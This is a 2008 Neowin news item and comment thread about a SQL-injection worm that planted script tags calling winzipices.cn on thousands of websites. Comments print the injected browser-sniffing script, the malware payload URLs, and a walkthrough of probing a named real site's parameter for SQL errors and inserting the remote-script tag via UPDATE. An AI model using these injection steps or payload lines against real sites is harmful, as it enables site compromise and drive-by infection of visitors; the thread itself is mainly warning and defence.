Neowin.net - Web attack worm on a rampage

Web attack worm on a rampage

Posted by Steven Parker via OSNN on 08 May 2008 - 12:30 · 37 comments & 13210 views

The Internet Storm Center, which tracks online threats, warned Wednesday that a worm is infecting vulnerable Web sites with a database attack. Though relatively small by Web attack standards with about 4,000 reported infected sites, the assault adds invisible code to a site that can force visitors to download malware onto their PC. Bad PR, to say the least.

IMPORTANT: DO NOT visit the domain named in the following test, or any sites that show up on a Web search as having this domain listed in their pages' code (including cached pages). Doing so could infect your PC with malware.

To see if your site has been hit, run the following Google search: "site:your company domain (ex. pcworld.com) winzipices.cn" -- or search for that domain within your Web site's HTML code. If you find anything, let your IT know immediately. When I ran a search just now I saw sites for everything from insurance companies to cemeteries to universities that all appear to have been infected.

The worm uses a SQL injection attack, according to the ISC, but it doesn't yet know just what vulnerability is targeted. The attack highlights the importance of keeping your site secure, something I wrote about last month. It's likewise critical to keep your own PC software up-to-date, as the ISC says visitors to infected sites can be hit via a known flaw in old Real Player software.

News Source: Computer World

Hide additional information

About the Author
Full name: Steven Parker
Forum name: Neobond
Contact: via forum PM
Submissions: Normal · Headline

Total votes: 3

Bookmark on del.icio.us

Advertisement

#1 Posted by redeemed on 08 May 2008 - 12:35: Wow...

(1 reply) #2 Posted by Davebo on 08 May 2008 - 13:05: I'd like to see a website "force" me to do anything....

(1 reply) #3 Posted by lardboy on 08 May 2008 - 13:53: Another good reason to be using firefox with noscript installed

(2 replies) #4 Posted by u2_storm on 08 May 2008 - 14:05: I did a search and couldn't find anything..... I tired a load of sites I use... nothing... anyone elsE?

(2 replies) #5 Posted by Hell-In-A-Handbasket on 08 May 2008 - 14:51: put in google "site:* winzipices.cn" -- ( with quotes ) will give the full list, its alot

bunch of schools are on the list

#6 Posted by u2_storm on 08 May 2008 - 14:56: Ah!, Pricerunner has it...... yicks!

(3 replies) #7 Posted by SkyyPunk on 08 May 2008 - 15:00: well, I am running Vista x64, no antivirus, defender disabled. I tried a few sites, nothing happened . I looked at the source of the script it loads, manually went to the page it tries to load in an iframe, and still nothing .... i am rather disappointed

#8 Posted by Munkyman on 08 May 2008 - 15:22: Has moviesunlimited been hit or am I mistaken?

#9 Posted by Magallanes on 08 May 2008 - 16:41: ????

There are a script that open a iframe, this iframe will open a file with extension .as , this as finally open the next picture:

~~http://www.bsu.edu/web/nmmakridakis/images/lolret6.jpg~~
(i dont find any virus from this file with my antivirus update, may be the virus is in the .as

#10 Posted by Kushan on 08 May 2008 - 16:42: So what exactly does this do to you if you visit one of these sites?
I find it hard to believe that it manages to affect all browsers on all OS's, so a bit more information would be nice.
Unless it just pops up with a .exe to download or something stupid like that?

#11 Posted by Magallanes on 08 May 2008 - 16:49: window.onerror=function(){return true};
if(Isie6())
{
document.writeln("");
}

if(Isie7())
{
document.writeln("");

}

if(isFirefox=navigator.userAgent.indexOf("Firefox")>0){
document.writeln("");

}
function Isie6()
{
var agent = navigator.userAgent;
str = "MSIE";
if ((i = agent.indexOf(str)) >= 0) {
this.isIE = true;
if(parseFloat(agent.substr(i + str.length))==6)
{
return true;
}
else
{
return false;
}
}
}
function Isie7()
{
var agent = navigator.userAgent;
str = "MSIE";
if ((i = agent.indexOf(str)) >= 0) {
this.isIE = true;
if(parseFloat(agent.substr(i + str.length))==7)
{
return true;
}
else
{
return false;
}
}
}

It is the virus, firefox is safe.

The virus will trigger with : h**p://winzipices.cn/6.gif (iexplorer 6) and h**p://winzipices.cn/7.gif (iexplorer 7)

(2 replies) #12 Posted by +spikey_richie on 08 May 2008 - 17:06: 9,380 sites come up in a google.com search now

(1 reply) #13 Posted by +warwagon on 08 May 2008 - 17:18: time for anyone who is not on a 64 bit windows to install and browse with sandboxie

(2 replies) #14 Posted by hapbt on 08 May 2008 - 18:16: lynx and elinks are not vulnerable to any of these exploits!

#15 Posted by parky37 on 08 May 2008 - 18:37: One of my company's clients got hit with this. I was feeling kind of crummy that I couldn't figure out the attack vector, but it's nice for my ego to see that the security experts haven't figured it out either.

#16 Posted by +dysmatik on 08 May 2008 - 19:17

#17 Posted by LipSmacker on 08 May 2008 - 19:20: infected sites can be hit via a known flaw in old Real Player software.

Anyone still use Real Player?? (Besides grandma?)

#18 Posted by Airlink on 08 May 2008 - 22:17: http://www.youtube.com/watch?v=KmK1agiw1wE

#19 Posted by andy2004 on 08 May 2008 - 23:14: if you have NOD32 Version 3 add *winzipices.** to blocked address list ! or whatever equivalent function your AV has

#20 Posted by +RuudJacobs.NET on 08 May 2008 - 23:24: winzipices.cn = down ? The pic sites work but FF 2.0.0.14 doesn't load anything except picture could not be loaded, contains errors message.

#21 Posted by Cephas on 09 May 2008 - 00:30: It's quite obvious how this attack works, though I'm not sure what makes it a worm (maybe the payload scans more sites?).

The attack virus checks for simple SQL injection holes in ASP pages (by spidering the site and putting bad data for the URL/CGI parameters that would output an OLE/ODBC error on the webpage). Once an SQL injection hole is found, it's a trivial matter to get the database structure and insert the payload script reference into various strings.

For example, the first hit for "site:* winzipices.cn" on google:

http://www.wiredseniors.com/seniorssearch/...d_And_Breakfast

Let's test the cn parameter in the URL:

http://www.wiredseniors.com/seniorssearch/...?cn=152101'

It returns:

Microsoft OLE DB Provider for SQL Server error '80040e21'

The requested properties cannot be supported.

E:\DOMAINS\WIREDSENIORS.COM\WWWROOT\SENIORSSEARCH\DIRECTORY\../../cgi-bin/seniorssearch/dir/page_include_new.asp, line 133

With a bit more searching, it shouldn't be hard to find a proper SQL injection hole. Then you just need to get the database structure to figure out which tables to "UPDATE blah SET blah = blah + "<script src="http://winzipices.cn/2.js"></script>"".

ASP SQL injection is so popular that I'm surprised an automated attack hasn't happened until now.

#22 Posted by +PharosBR on 09 May 2008 - 04:54: Makes me think how valuable Vista's UAC actually is! If I came across a vulnerability like this, AFAIK a UAC dialog should pop up asking for admin priviledges, and since I never get those UAC dialogs while just browsing the net, I'd be very suspicious and I'm sure most people would, too.

See, UAC ain't that bad real world example of why you should leave it on and just quit moaning about it once and for all!

Last edited by PharosBR on 09 May 2008 - 05:04

#23 Posted by Jonathan Yaniv on 09 May 2008 - 19:05: USE OPENDNS, AND BLOCK THE INDIVIDUAL DOMAIN NAME: winzipices.cn

[1]

Commenting has either been disabled on this article or you are not logged in. Click here to login or register, its free!

Note: Anonymous commenting is disabled in order to keep the quality of responses to a high standard.

Scroll to the Top